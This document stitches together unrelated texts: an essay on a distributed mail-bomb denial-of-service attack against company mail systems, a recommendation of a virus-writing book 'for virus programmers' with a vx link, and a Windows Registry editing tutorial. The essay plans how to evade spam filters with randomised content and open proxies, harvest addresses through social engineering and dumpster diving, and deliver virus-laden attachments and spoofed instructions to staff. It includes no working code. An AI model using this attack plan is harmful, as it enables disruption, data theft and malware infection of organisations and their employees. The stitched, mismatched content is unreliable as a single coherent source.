Mail "Bombing" is perhaps one of the oldest and certainly considered one of the "lamest", that is to say; ineffective and immature, methods of "attack" available to the would-be "script kiddie" or otherwise malicious user online. Simply dating back to the first time someone realised hundreds of irrelevant emails sent to someone else's inbox could be an extreme, and most importantly time wasting, annoyance. The theory behind the attack is relatively simple; flood your chosen targets inbox with as many junk emails as possible over a given time vector; for example an attacker may devote a few hours run time to sending the "bomb". In practise the attack is easily achieved with varying degree's of success by any number of specifically designed programs able to send thousands, if not tens of thousands, of emails on command over a relatively short space of time.



However a flaw had developed with this attack strategy (which at it's conception was in fact quite effective). As the internet developed from an academic to a more commercial institution and due to the vast swathes of Spam mail (eg. junk mail) online, complex and often very effective anti-Spam (in this context interchangeable with the term "anti-junk") backend software (such as White Mail, www.whitemail.ie) has been developed with the soul purpose of preventing junk mail arriving in users inbox's.

Such software effectively nullifies a traditional Mail Bomb attack by such methods as:

a) blocking incoming mail from an IP when an inordinate/inappropriate number of emails have been received from that IP,

b) filtering emails by topic and content; blocking any which are considered by sophisticated backend databases to be Spam or
c) blocking known "problem" (that is to say open and or Spam generating) IP's in the first place.

But could you increase a theoretical "Mail Bombs" effectiveness if you were to randomise your "bombs" origin IP and content, how effective could such an attack be?

Additionally if it is possible to increase the effectiveness of a Mail Bomb as an unconventional Denial of Service attack; would that increase in effectiveness be further stimulated by specifically targeting it toward one target with the intention of not only causing the traditional virtual damage (in terms of network bandwidth etc.) but also aiming to cause maximum disruption to the targets "wet ware" network, that is to say real life employees, by exposing them directly to an online attack.


2. Method

The first objective was to locate sufficient open proxies capable of one way or another relaying outgoing mail. This did not prove to be any great challenge. A short search online located at least one extremely efficient piece of third party software which downloads an updated list of open proxies specifically for this task on demand.

The specific software will not be named in the interests of not unnecessarily increasing the possibility of malicious users actually utilising this attack or indeed, it becoming widespread; likewise any custom code used in the research of this paper. However it is important to recognise the fact that such software (and even if you ignore the previous statement) if not already existent, could easily be written, perhaps more dangerously, specifically written into purpose coded mail bomb software even to the alarmingly sophisticated extent of actually being able to cunningly spoof not only an emails domain of origin but ALL aspects of the email header on a multithreaded and randomised basis, thus totally cloaking the origin of the attack. The theory is sound.

The next objective was to theorise over a suitable target. I choose to speak to an employee of whitemail.ie; wanting to test this theoretical attack against the might of the White Mail back engine; one of the better anti-Spam solutions on the market.

To my surprise the White Mail engine was practically defenceless against a targeted mass distributed mail bomb attack; as I will assume all "anti-spam" backend software is simply and understandably because such software is not designed to defend against such attacks. The multithreaded nature (that is not say; multi-angled from an origin perspective) makes blocking such an attack a very complicated affair. You cannot prevent a target being affected by simply blocking an attackers IP address after a disproportionate number of mails. Further more, by carefully but definitively randomising topic and content to contain non-spam related keywords. Such as, for example:

Subject: Cheers.




Content: Thanks for letting this mail

arrive. Great help to me!




It is highly unlikely that any existing Spam blocking backend will filter out such inconspicuous emails. They simply do not contain any words or phrases which an anti-Spam database will consider threatening, or at least threatening enough to block. Additionally as pointed out to me by a number if industry related individuals while discussing this issue, attaching .pdf files of a suitably large file size will also often ALLOW emails to slip past anti-Spam software for the also simple reason that there is no reason to maliciously send a .pdf as it is largely impossible for them to be in any way malicious; other than perhaps in the case of this theoretical distributed mail bomb attack that is.


3. The Attack Vector

In order to attack a target one must first locate as many email address based upon the targeted network as possible. This would be the first task of any would-be mass mail bomber. The obvious, most effective and indeed simplest attack vector for this are internal mailing lists.

I sent out a questionnaire to a number of IT staff and network administrators to ascertain the legitimacy of my proposed attack vector but knowing from my own experience that a high degree of internal mailing lists are open to receiving email from the internet as opposed to the perhaps safer practice of limiting access to such addresses to the local intranet.

The questions posed were:

1) Does your company use mailing lists for departmental email notifications?

2) If so, are the mailing lists usable from "Net Side"?

One hundred per cent of the questionnaires returned a positive answer to the first question and of those fifty per cent of them returned a positive answer to the second question.

We can conclude roughly from this (without conducting detailed research into the common state of this attack vector over a much wider cross section, which although in the long term very possibly worth doing, was not the main aim of this particular investigation) that around fifty per cent of corporate (or commercial) networks are vulnerable to a theoretical targeted distributed mass mail bomb attack.

The attack vector legitimised and confirmed the next problem for a would-be attacker would be to attain the actual email addresses to bomb. Such addresses can be procured in a number of ways; perhaps the most simple of which being trial an error test mails to the most common possibilities: ie. accounts@target, marketing@target etc etc.

It is also possible (if a little unlikely) that you could socially engineer an answer from the target themselves. It may sound ridiculous to suggest that you could simply phone a targets switchboard, ask for accounts, then simply request the departmental mailing list address; but stranger things have happened, and with the right degree of skill, and a strong cover story anything can be achieved with social engineering. The weakest link in a network is often it's users.

Naturally there are other perhaps more sophisticated methods of obtaining internal mailing list addresses; if one was for example to gain access either on site (a job interview, obviously under a false name) or remotely to the network intranet (back to basics hacking) for example it is highly likely that such lists could be easily located. Additionally 'trashing' (the practise of going through waste bins for information) a target is also likely to yield enough of the internal addresses necessary for this attack to be effective.

There is also always the possibility of 'brute force' bombing. Firstly ascertaining the common syntax of email address for your target (ie. first.surname@target or name@target etc.) then emailing random combinations of names to the targeted network using our theoretical mail bombing software and a database of names (which is probably available or otherwise relatively easily constructed), which although from the attackers point of view would take longer and has a definite lower degree of effectiveness is never the less likely to be effective to at least some degree; largely dependent on how the post office on the target network deals with emails with unknown target addresses. The very worst case positive scenario for the attacker would be to utterly swamp a post office which sends all unknown mail to the postmaster (still not an uncommon practice) with all the mails that were aimed at random combinations of words/names. A result which still achieves some of the desired effect (ie. an increase in the Total Cost of System, such factors to be discussed in more detail later).

It is also important here to note the potential damage that could be caused by various attachments if used in a suitably cunning manner; adding .pdf attachments to mails to feign legitimacy has already been mentioned, but now consider for a moment the possibility of inclusion of compromised .jpg's (ie. jpg's which have been altered to contain code which when executed in certain Mcft software, a recently patched but likely still extremely viable secondary theoretical factor to this attack).

Such .jpg's, for example, Within a .html based email (perhaps as the focus of the mail, perhaps as a false company logo etc.) could become a very effective tool. Dependent on what code you choose to add to these .jpg's all manner of havoc could be wreaked upon an unsuspecting intranet. The downside to this from an attacking point of view is the inherent increase in the likelihood of detection by anti-Span or anti-Virus software when adding known malicious code or exploits to your mass mails. However when talking about this theoretical attack one must always remember it's a) distributed and b) mass nature. If you send five thousand emails and only three thousand make it past whatever defences there may be, that can still be considered an effective attack within the context of the theory. The key here would be utilising the attack vector to deliver a new perhaps unknown virus or exploit.


4. Fictional Timeline

Imagine that the internal mailing lists for following departments within the target are procured and confirmed: accounts@ sales@ humanresources@.

Out of the target's posted business hours five thousand emails are sent to each of the procured addresses (a relatively low amount). On a random basis some contain large legitimising .pdf attachments, some contain .jpg's infected with virus code designed to destroy the working system directory on infected machines (you can interchange the use of .jpg's here with any java based attack past present or future and the designation to destroy the system directory with just about anything you can imagine; more subtle or otherwise).

Additional emails are sent spoofing localhost domains of the target and instructing users to execute more infected .jpg's (or java script) in order to read instructions on how to cope with the incident. This will further increase the likelihood of any malicious code which makes it past Anti-viral software actually being executed.

Employee's arrive for work discovering a vastly disproportionate number of emails in their inboxes, lost amongst which is their legitimate email. The common and indeed procedural response (confirmed by another question posed on this papers distributed research questionnaire) would be to either phone the IT Department, or lodge a formal request for IT help on a ticket system of some kind. It would not take long for an IT department to become swamped.

Some employee's would, statistically, fall for the ruse adding to the primarily "Wet Were based DoS" already caused by the sheer number of mails that have arrived a more traditional digital attack. Put simply; the more "traps" you send the more likely someone is to trip one; and ultimately an exploit is to be executed. It is an unfortunate fact that a high degree of non "IT Department" staff do not have sufficient computing knowledge to identify such threats. One professional going as far as commenting "The business I currently contract all my time out to? hopeless. Utterly hopeless." In answer to the question "How would you rate the general IT knowledge within your company?" on this papers research questionnaire. A response that can only be encouraging to would-be attackers in all shapes and forms.

The additional question: "Generally speaking do non-IT related employee's in your company understand the risks associated with windows related exploits?" Was posed to which the common answer was a resounding "No."

From this we can conclude with a high degree of certainty that unless the network was entirely and faultlessly patched (an attacker would naturally use the most recently discovered or indeed unknown home grown exploits) infection and or severe damage to at least some target machines would be unavoidable.

5. Effects

The effects on the target network would thus be five fold:

1) Employee's unable to sort their own legitimate email from a mass of junk mail and thus only able to carry out their usual function with varying degree's of success (depending on their function in the first place sales@ in this fictional scenario being perhaps most affected by this element of the "Wet Ware DoS"). This is the primary effect of the attack.
2) A swamped IT department. Perhaps unable to respond as quickly as they should do to any additional threat levelled at them (for example a more conventional DoS attack).
3) Actually lost or damaged data within the target network.
4) Depending on the code added to the planted .jpg's/javascript; viral infection of the network, possibly resulting in remote access doors being opened (naturally depending on the firewall software/hardware located at the target) effectively making this DoS a possible cover for the planting of a further future attack vector in the form of Trojans, or even perhaps data miners searching for specific data and emailing or otherwise sending back, such data to a specified location; it pains to imagine what information could be deliberately searched for on a targeted network; bank account details, employee personal details, perhaps even full and detailed lists of the targets email address (which could aid an attacked in sustaining the attack if the net side internal mailing lists were disabled by the targets network administrators; a sensible first line of defence). The possibilities are endless.
5) Ultimately the DoS causes a vast increase in the Total Cost Of System for the target; which will last as long as it takes to both disinfect the system and to purge all post boxes of junk mail. The beauty of this is that it is so simple to execute; the DoS could be automated, a process set up to attack the target every day at a certain time; with no methods of blocking such an attack being immediately obvious. Without taking drastic measures to block every IP from the distributed attack (a thankless task; given the fact there are always more proxies) this form of attack has the frightening potential to cripple a targets email indefinitely.


6. Conclusion

Due to the relatively obscure and surprising nature of this DoS (mail bombing is not commonly used to disrupt in such an organised manner) combined with the fact that the current generation of email filtering software (anti-Spam/anti-viral backends) are ill prepared to deal with such attacks, it is theoretically potentially disastrous to any target with an identified open main attack vector (that is to say mainly net side internal mailing lists) and is additionally equally as dangerous if a malicious user can otherwise identify, on mass, lists of email addresses relating to the target (via trashing and other methods discussed earlier).

On top of the primary effect; ie. the confusion and disruption potentially caused by this attack in its purest form it is also an effective and dangerous delivery system for, in particular, un-patched or new exploits/virii. An effective method for blocking such attacks needs to be developed before any damage is caused by one.

The Giant Black Book of Computer Viruses
Mark Ludwig
American Eagle Publications, Inc.
ISBN 0-929408-10-1
1995


Check it out :- http://vx.netlux.org/lib/vml01.html

Very good book for virus programmers

The registry is a database that stores all the Operational System configuration and informations. The Registry Editor Tool is located by default in the System folder. The 16-bits Windows95,98,ME Registry Tool (application) is called ?Regedit.exe? while 32-bits Windows NT4,2000,XP,2003 have both ?Regedit.exe? and ?Regedt32.exe? applications. The files that composes the registry in Windows 95/98/ME are ?system.dat? and ?user.dat?. On Windows NT/2000/XP/2003 the files are ?SOFTWARE?, ?SYSTEM?, ?SECURITY? , ?SAM?.

Main

To open your Registry Editor Tool go to ?Start? ? ?Run? and type ?regedit? without the quotes. The ?Regedit? window will appear and you will see a main element that is ?My computer? . When you double click it you will see the Registry ?ROOT KEYS? They have a 'folder icon' and they are like directories. There are 5 RootKeys. PS: Windows 95 and 98 have a 6th RootKey called HKEY_DYN_DATA A table is available below with the RootKeys names and a basic description for each of them.





ROOT KEY


Description

HKEY_LOCAL_MACHINE


Contains specific configuration information of the computer. (Valid for any user)

HKEY_CURRENT_USER


Contains the base of configuration information for the current logged-on User. Screen, colors, Control Panel and folders configurations are stored here. These informations are called ?User Profile?

HKEY_USERS


Contains the bases of all users profile on the computer. HKEY_CURRENT_USER is a sub-key of HKEY_USERS

HKEY_CLASSES_ROOT


It is a sub-key of HKEY_LOCAL_MACHINE\SOFTWARE.

The informations stored here guarantees that the correct program will be executed when you open a file using the Windows Explorer

HKEY_CURRENT_CONFIG


Contains information about the hardware profile used by the local computer in the system startup

HKEY_DYN_DATA


(Windows 95,98,98SE Only)

Contains configuration informations that are stored in RAM and statistics gathered for many network components currently in use on the computer. The information in this key is newly created on every Windows startup.





Those ?RootKeys? above have some keys with sub-keys (left side of the Registry Panel). The keys and sub-keys contains values of a valid type and with some data (right side of the Registry Panel). These values contains information such as strings and numbers. Some numbers have a specific meaning that will affect the Windows configuration depending on what it was set to. The Windows 9x/ME Registry editor seems to only fully read REG_SZ , REG_DWORD and REG_BINARY value types. It doesn�t display the type in the ?Regedit? window, only the value names and its respective datas. The following table provides a quick description of the value types and their properties.

Type


Description

REG_BINARY


Usually hardware-specific data stored in hexadecimal format, as viewed from regedt32.exe. By default, it will be displayed in hex, but the editor can use either binary or hex display.

REG_DWORD


Usually service- or device-related data. The value is numeric, four bytes long, and viewed as hex data, but can be edited as binary, decimal, or hex. To avoid headaches, I also edit it as hex lest I confuse myself.

REG_DWORD_BIG_ENDIAN


This data is stored as a 32-bit value. The data is weighted with the highest-ordered byte first.

REG_SZ


Terminated fixed-length text (Unicode) string. These and other SZ datatypes are given String editors by the registry editor to administer the values.

REG_MULTI_SZ


Multiple data listings, represented by text. These values can be separated by spaces, commas, or other delimiters.

REG_EXPAND_SZ


A data string whose data length may change. An example is the folder path to a file or directory for application and environmental variable support.

REG_LINK


Linked data stored in Unicode format.

REG_FULL_RESOURCE_DESCRIPTOR


When viewed, gives information such as hardware DMA, IRQ, and memory address length. Data is displayed in hex and can be edited using byte, word, or dword format. Regedit.exe gives only a binary editor with hex representation of the data, without regard to specific application of the data.

REG_NONE


When values are not given as to datatype by an application, or the data is encrypted so that Server 2003 is unable to determine the value type.

REG_RESOURCE_LIST


regedt32.exe displays basic type hardware resources?interface type and bus number

REG_RESOURCE_REQUIREMENTS_LIST


Related to Hardware or Driver. The value data is represented in hex format. It displays a requirements list that contains elements such as ?Alternative List? , ?Resource List? , ?Descriptor?, ?Device Type?

REG_QWORD


Just like ?REG_DWORD? value type. The only difference is that REG_DWORD is a 32-bit number and REG_QWORD is a 64-bit number.





You can edit Registry ?values? to fit your needs, or modify some configuration but it is extremely important that you know what exactly you are doing, what will be the effects on the Operating System. It is highly recommended that before editing the registry you do a complete backup of it. To do this right click on the first element, that is 'My Computer', and then click on 'Export'. All the information existent on your Registry will be saved in a .REG file that can be edited with notepad and executed by double-clicking on it. Notice that .REG files are Registry scripts that edits the registry. Editing the registry means that it can add, rename or delete keys, modify, add or delete a value. To delete a key on the registry, right click on the desired key and click 'delete' To add a new subkey, right click on the main key you want to create it on and click 'new key'. You can set up a name for this key. eg: create a key called 'abc' on the 'Software' key of HKEY_CURRENT_USER root key. Double click on my computer, then double click the Root key HKEY_CURRENT_USER, then double click the key Software and you will see its subkeys and values on the right side of the Registry Panel. Now right click on 'Software', click 'new' then click 'key' and rename it to ABC . Suppose now you want to add a string value type of REG_SZ called '123' and value data as 'windows' Right click on the 'ABC' key, click on 'new', then click on value of the sequence. a REG_SZ value type will appear on the right side of the Registry screen. Rename it to '123' and press enter. Now double click this value and type 'windows' on the "value data" field . Press enter and you are done. Now let�s add a REG_BINARY value type called 'Bin' to the 'ABC' key and value data 43; Right click the 'ABC' key, click 'New', then click 'Binary value'. Rename this value to 'BIN' Now double click the 'BIN' value and type '43' on the "value data" field. Notice this field is big and when you type something it is automatically converted to hexadecimal, appearing as a decimal value on the center of the "value data" field and appearing as a hexadecimal value on the right side. at the left side there is 4 numbers. These 4 numbers appears on each line, depending on the numbers of lines took to write the value data. It begins with '0000' in the first line; 0008 in the second line; '0010' on the third and so on. REG_BINARY values can be in Hexadecimal or in bytes. It is possible to add a Registry key to ?Favorites? so that you can open it very fast without having to open the RootKey, then the sub-key, the the other sub-key and so on. To do this, on your ?Regedit? window, go to they desired key and click it once; Now , on the top of the ?Regedit? window, click ?Favorites? and click ?Add to Favorites?. A small window will show up displaying the name of the key on the white field. You can rename it to whatever you want and click ?OK?. For example you can add HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services to ?Favorites? and name it NT_SERVICES. When you need to quickly access this key, you click ?Favorites? then select ?NT_SERVICES?. You will be instantly brought to the ?Services? key. It is possible to delete these ?Favorites? as well.

REGEDIT.EXE and REGEDT32.EXE Applications . What�s the difference???

REGEDIT.EXE application when run can view and edit keys and values on the registry of NT based systems but only partially cause it is intended for 16-bit Windows. Only REGDT32.exe application can fully edit the registry and it is intended to 32-bit Windows. On Windows NT and 2000 if you use REGEDIT.EXE to edit REG_EXPAND_SZ and REG_MULTI_SZ value types you will have problems cause the value will become a normal REG_SZ type and therefore will not perform the expected action. Also it is not possible to edit Security in the registry keys. On Windows XP and 2003 REGEDT32.EXE is only a small tool to open REGEDIT.EXE application. Fortunately REGEDIT.EXE application on XP and 2003 can fully edit the registry.

Permissions & Restrictions

It�s also possible to set up access permissions on Windows 2000,XP,2003 for Rootkeys and sub-keys. To do this, right click on a registry root key or sub key and click on "Permissions". A new window will appear. There you can select what users can access or modify on an specific root key or sub-key and their access rights. Users with administrator privileges have, by default, full access; That means, read, write, delete any key or value. Restricted users can only read. They can write or delete some specific keys or values, generally related only to that user itself. Some keys in the registry cannot be even read by restricted users. You can customize those settings: A list of existing groups and users of the local computer will be available. You can customize what users can have full access to, or restrict access, depending on your needs, by selecting what kind of access a specific user will have to the selected key to set the permissions. You can select, for example, only the read right on that key. Supposing this user is called 1, and you have users 1,2,3 everyone with admin privileges, when you set up this restriction, only User 1 will be able to only read . users 2,3 will have full access. You can also do this to a registry sub-key. The procedure is the same. Also you can restrict specifc user(s) to view a root key or a sub key. This means that the user won?t be able even to open that selected key. if that user tries to open that key, an 'Access denied' error message will show up. Registry Permissions/Restrictions in general are important when you have more than one person accessing the computer, or when the computer is inside a LAN that has many users accessing it and the computer has important data.

Remote Registry

There is a service in Windows 2000,XP,2003 called ?Remote Registry. By default this service is enabled and automatically starts on every Windows boot. It�s like a ?Registry server? intended to receive remote connections of computers of the same network. To connect to a computer running

The Remote Registry service, in your ?Regedit? window click ?File? , then click ?Connect Network Registry?. A small window titled ?Select Computer? will show up. You will have 3 basic fields:

First one is titled ?Select this kind of object?. Below this it is written ?Computer?. The second field is titled ?From this location?. Below it is written ?GROUP?. The third field is titled ?Type the object name to be selected?. Below this there is an empty field where you are supposed to type a valid Computer Name or IP address. Supposing inside your network you have a computer called Comp1 and IP address = 192.168.5.5 . You can type ?Comp1? or ?192.168.5.5? in this field. Click ?OK?. If all was right you should get a Logon Prompt. As this service by default is designed for a main security user (Windows XP and maybe 2003, I didn?t test on 2000 but should be identical) you can type there the

Name of this user that is ?NT AUTHORITY\NetworkService?, click ?OK? and after few seconds be connected to the remote computer. (NT AUTHORITY is the domain name and NetworkService is the user name; Domain Name was specified since NT AUTHORITY is not the default domain name.) You can also login with any other valid User Name existent in the target computer.

After connected to the remote computer�s Registry you will see the computer name or IP address depending on which of them you have specified. 2 Root Keys will be available for edition :

HKEY_LOCAL_MACHINE and HKEY_USERS\s-1-5-xx where xx is the number related to the Username you logged on to the remote computer. To disconnect click on ?File? then click ?Disconnect Network Registry?.




Importing to the Registry




Besides those things you can do, it is also possible to edit the Registry using scripts, and applications written in most programming language such as C++, Java, Fortran, Visual Basic, Delphi, Asm, etc? The scripts could be the default Registry script file (.REG files), VBScript, Javascript, etc ? In this tutorial we will only discuss the default Registry Script (.REG files) .

With the .REG scripting you can basically add values to the Registry, delete values, delete keys, add keys and modify values data. This type of Script begins with a ?title? being the Version of the Windows Registry . For Newer Windows, it is usually ?Windows Registry Editor Version 5.00?. But if you want a script that is compatible with ANY Windows version, including 95,98,ME,NT4 you can change this ?title? to REGEDIT4 .

Notice that it is very important that you write the ?title? exactly as it appears. If you, for example, type regedit4 it won�t be recognized by Windows and errors will happen. Same thing goes to version 5. If you type ?windows registry editor version 5.00? you will run into errors as well. The structure of this script is the following:




----------------------------------REG Script -------------------------------------------------------------

Windows Registry Editor Version 5.00




[HKEY_LOCAL_MACHINE\SOFTWARE\MySoft1]

@=?MySoft1 default value?

?Value1?=?3?

?Type?=dword:00000001

?Environment Variable?=hex(0):40,01,00,00,0f,00

?Key?=hex: 20,04,00,00,0f,00,70,00,50,00

?RelativePath?=hex(2):63,00,3a,00,5c,00,6d,00,79,00,73,00,6f,00,66,00,\

74,00,31,00,5c,00,73,00,6f,00,66,00,74,00,2e,00,65,00,78,00,65,00,00,00

?Applications?=hex(7):61,00,62,00,63,00,20,00,64,00,65,00,66,00,20,00,\

67,00,68,00,69,00,20,00,6a,00,6b,00,6c,00,00,00,00,00

?MainType?=hex(5):40,01,00




[HKEY_LOCAL_MACHINE\SOFTWARE\MySoft1\Preferences]

?AlwaysRunMaximized?=dword:00000001




-----------------------------End of REG Script----------------------------------------------------------




Notice that REG scripts begin with the Version information of the Registry Editor.

If you try to import REG scripts that begins with ?Windows Registry Editor Version 5.00? to a Windows 95,98,ME or NT4 Registry, you will get an error. In order to overcome this you can start the script with REGEDIT4 instead. This one is intended to any Windows version, including recent ones like XP Service Pack2 and Windows2003. The second line of the script is in blank, just to let it more organized. Next line you have the Registry path between brackets ?[ ]?. Notice that if you forget those brackets the script won�t do what it was supposed to. In the line below it there is a ?@ ? (with no quotes), an ?equal? signal after it, and ?MySoft1 default value? (between quotes). The ?@? means the default value. Every key that you create will contain this default value, and usually contains no data. If no data specified you will see this: (Value not defined). The equal signal must exist to separate values and its datas. The value name in this case is ?Default? , type REG_SZ with data being MySoft1 default value. The same thing goes to the line below:

The value name is ?Value1?, type is REG_SZ and value data is ?3?. Notice that any value except the ?Default Value ( ?@?) must appear between quotes. When you have value types different from REG_SZ, the respective data will appear without the quotes. Notice that the other values data (REG_DWORD,REG_BINARY,REG_EXPAND_SZ,etc) appear without the quotes. Notice that the other values datas, except the REG_DWORD and REG_SZ types, begins with hex: or hex(z): , Where ?z? is a number between 5 and 9, and this will be the determinant of the value type. ?z? could also be 0 or 2, or could have no value between the brackets (eg: hex:00,12,00 or hex(2):00,01,00) and also could be ?a? or ?b?. Below there is a table with these values for ?z? and the resulting value type.




HEX(z):


Resulting Value Type

Hex:


REG_BINARY PS: this is the same as Hex(3):

Hex(0):


REG_NONE

Hex(1):


REG_SZ PS: Not recommend to use this specific hex(1): due to generate data that is not correctly interpreted by the Registry and therefore will appear as ?weird? symbols.

Hex(2):


REG_EXPAND_SZ

Hex(3):


REG_BINARY PS: this is the same as Hex:

Hex(4):


REG_DWORD PS: Not recommend to use this specific hex(4): due to generate data that is not correctly interpreted by the Registry and therefore will appear as ?invalid dword value. Simply use dword: instead

Hex(5):


REG_DWORD_BIG_ENDIAN

Hex(6):


REG_LINK

Hex(7):


REG_MULTI_SZ

Hex(8):


REG_RESOURCE_LIST

Hex(9):


REG_FULL_RESOURCE_DESCRIPTOR

Hex(a):


REG_RESOURCE_REQUIREMENTS_LIST

Hex(b):


REG_QWORD

The 14th line as you can see is in blank (for organization purposes) and just below there is another Registry path that is just the same as the 1st one in line3, but there is a subkey for ?Mysoft1? called Preferences, and a value type of REG_DWORD called ?AlwaysRunMaximized? with data as 1 (in dword 0x00000001). This is not just an information, this has a meaning. The meaning is ?1?. And 1 means True. 0 means false.

Well so we can figure out that ?MySoft1 program? Window is configured to run always in always maximized. Some programs also stores configuration such as User password in the registry, but encrypted and it is usually a REG_BINARY value type.

The REG script below will delete a value from the registry and then, an entire key, including subkeys and values.




-----------------------------------------REG Script-------------------------------------------------------

REGEDIT4




[HKEY_CURRENT_USER\Software\Soft123]

?type?=-




[-HKEY_CURRENT_USER\Software\Soft123456]




-------------------------------------End of REG Script--------------------------------------------------




Notice the above script is able to run in any Windows version, not only in 2000/XP/2003.

(due to beginning with ?REGEDIT4?). The firs script will only be able to run on 2000/XP/2003, unless you change the title (?Windows Registry Edition Version 5.00?)

to REGEDIT4 . To delete a value it is used a ?minus? signal after the ?equal? signal of an specific value, in our case the value is ?type?. To delete a key in the registry, we simply have to put a ?minus? signal before the key path. This will delete the last key specified in the path (in the case Soft123456) and all its sub-keys and values.

None of the 2 scripts described above contained value types of REG_LINK, REG_RESOURCE_REQUIREMENTS_LIST, REG_RESOURCE_LIST, REG_FULL_RESOURCE_DESCRIPTOR, because these are related to Hardware information and configuration , very few used, except by the Hardwares itself by the time they are installed. REG_NONE and REG_QWORD types are also very few used. The first one happens when the Registry cannot interpret the data (sometimes because it is encrypted) and therefore cannot establish the value type. The second one is a 64-bit value generally used to store information about hardware stuff.




Exporting from the Registry




To export a desired key from the registry, you simply have to right-click that key and select ?Export?. A new window prompting where to save the key will show up. Where you see filename, you type the name you want for the file to store the informations about the key.

In the ?Save as type? field, you can select ?Registry Files (*.reg)? , ?txt file?, ?registry ramification files? or ?Win9x/ NT4 Registry files (*.reg)? .Depending on what you will do with the REG file, you will select one of those options. If its just for studying/analising purposes, then you can save it as a normal txt file. Let�s suppose this file will have informations about NT Services (nt services are only intended for the nt systems and therefore won�t work in Windows 95,98,ME) then the best is saving it as ?Registry Files (*.reg)? . But supposing the REG file contains informations about a software for example, and this software is able to run in any Windows version. Then it�s better to save it as

?Win9x/ NT4 Registry files (*.reg)?, because this way the file can be imported to the Registry of any Windows. Just bellow this, in the bottom of the window, you can see the ?Export Interval? section, and below the complete registry path to the key you will be exporting. If you double click a REG file you will be prompted with a message ?Are you sure you want to import the information contained in ?file.reg? to the Registry??. (Supposing ?file.reg? is the file you want to import to the registry). If you click ?No? the operation will be canceled, if you click yes, and the REG file is valid and correct you will get a message saying the information on the ?file.reg? was successfully added to the registry.




Editing the Registry via Command Line




We have already seen it is possible to edit the Registry manually and using scripts. It is also possible to edit it using the Windows ?Command Prompt? (COMMAND.COM in any Windows version and CMD.EXE in Win NT4/2000/XP/2003).

The REGEDIT.EXE tool has a GUI part and a command line part.

REGEDIT.EXE command line syntax:




Command


Effect

REGEDIT /E


Exports keys and values from the Registry to a .REG file

REGEDIT /I


Imports a .REG file to the Registry. Before writing to the registry a Confirmation prompt will appear asking if you really want to import the file to the registry

REGEDIT /S


Imports a .REG file to the Registry in silent mode. No confirmation prompts.




REGEDIT /D


Deletes a key from the registry. (Win9x only)

REGEDIT /L:System


Specify the location of System.dat to use (Win9x only)

REGEDIT /R:User


Specify the location of User.dat to use. (Win9x only)




REGEDIT /C


Compress the Registry. (Only works on Win98)




Below it will be shown usage examples for the above commands.




REGEDIT /E c:\file1.reg ?HKEY_LOCAL_MACHINE\SOFTWARE\Some Program?

This will export the registry key ?Some Program? located in ?HKEY_LOCAL_MACHINE\SOFTWARE? to a file called file1.reg in c:\




REGEDIT /I c:\file2.reg

This will import the informations in ?file2.reg? to the Registry. A confirmation prompt will show up.




REGEDIT /S c:\file3.reg

This will silently import the informations in ?file3.reg? to the Registry. No confirmations prompts




The above commands are the most used ones and works on all Windows versions.

The /L:System and /R:User parameters are optionals, only works on Win9x and comes before all the other parameters .

Example: REGEDIT [/L:System | /R:User] /S c:\file1.reg . This will silently import the informations in ?file1.reg? to the Registry, specifying the location of System.dat and User.dat to use.




REGEDIT /D is few used and only works on Win9x . It is intended to remove a key from the Registry. Example : REGEDIT /D HKEY_LOCAL_MACHINE\SOFTWARE\Soft1

This will delete the key ?Soft1? located in HKEY_LOCAL_MACHINE\SOFTWARE from the Registry.




REGEDIT /C will compress the Registry. It is intended to work only on Win98. The usage: REGEDIT /C [filename]




Windows XP and 2003 comes with a command line tool to edit the Registry and it�s called ?REG.EXE? .By default Windows NT4 and 2000 don?t have this tool, but it�s available in the ?Windows Resource Kit Tools? package and can be freely downloaded from Microsoft.com or simply copied, along the application ?Regini.exe?, from Windows XP or 2003.

Below there is a table with the ?REG.EXE? commands and their effects.




Command


Effects

REG QUERY


Queries a Registry key or value by its given name.

REG ADD


Adds a key or value to the Registry

REG DELETE


Deletes a key or value from the Registry

REG COPY


Copies subkeys and values from a key to another.

REG SAVE


Saves a Registry section to a file.

REG RESTORE


Restores a file to substitute a Registry key.

REG LOAD


Loads a file in a Registry key.

REG UNLOAD


Unloads a Registry Section

REG COMPARE


Compares values and sub-keys from a key with the respective values and sub-keys of another key

REG EXPORT


Exports/Loads a file in a Registry key.

REG IMPORT


Imports a file to the Registry.




REG.EXE makes it possible to write Registry RootKeys by its short name as showed below

HKEY_LOCAL_MACHINE = HKLM

HKEY_CURRENT_USER = HKCU

HKEY_USERS = HKU

HKEY_CLASSES_ROOT = HKCR

HKEY_CURRENT_CONFIG = HKCC




Below it is available some examples of the usage of the commands listed in the above table.




REG QUERY HKLM\SOFTWARE\Soft1 /v Config �? This will display the registry value of �Config?

REG QUERY HKLM\SOFTWARE �? Displays all the values and sub-keys of the key ?Software?




REG ADD HKCU\Software\Mysoft2 �? Adds a key called ?Mysoft2? to the Registry.

REG ADD HKLM\Software\War /v Types /t REG_DWORD /d 1 /f �? Adds a key called ?War? (in case it doesn�t exist yet) and a value called ?Types? with type of REG_DWORD to the Registry. If ?/t? is omitted the value will be type REG_SZ. The ?/f? parameter is to force the action that is being taken with no confirmation prompts.




REG DELETE HKLM\SOFTWARE\MySoft1 /f �? Deletes the key ?Mysoft1? and all its sub-keys and values with no confirmation prompts.

REG DELETE HKLM\SOFTWARE\MySoft3 /v path /f �? Deletes the value ?path? located in ?Mysoft3? key with no confirmation prompts.




REG COPY HKCU\SOFTWARE\Soft1 HKCU\SOFTWARE\Soft1_Backup /f �? Copies all the sub-keys and values of ?Soft1? key to the ?Soft1_Backup? key without confirmation.




REG SAVE HKLM\System\CurrentControlSet\Services c:\Services_Backup.TXT �? Saves the Registry Section ?Services? in the file Services_Backup.TXT located in C:\




REG RESTORE HKLM\System\CurrentControlSet\Services c:\Services_Backup.TXT �? Restores the file ?Services_Backup.TXT? to substitute the Registry key ?Services?.




REG LOAD HKLM\System c:\hklm_System.TXT �? Loads the file hklm_System.TXT in the registry key ?HKLM\System? .




REG UNLOAD HKCU\Software �? Unloads the ?Software? section in the RootKey ?HKCU? .




REG COMPARE HKCU\Software\MySoft2\System1 HKCU\Software\MySoft2\System2 �? Compares all the values under the key ?System1? with ?System2?

REG COMPARE HKCU\Software\MySoft2\System1 HKCU\Software\MySoft2\System2 /v Path �? Compares the the value of ?Path? in the keys ?System1? and ?System2?.

REG COMPARE HKCU\Software\MySoft1 HKCU\Software\MySoft2\ /s �? Compares all the values and sub-keys in the keys ?MySoft1? and ?MySoft2?.

Return Codes: 1 = Success, the compared result is identical. 2 = Failure. 3 = Success, the compared result is different.




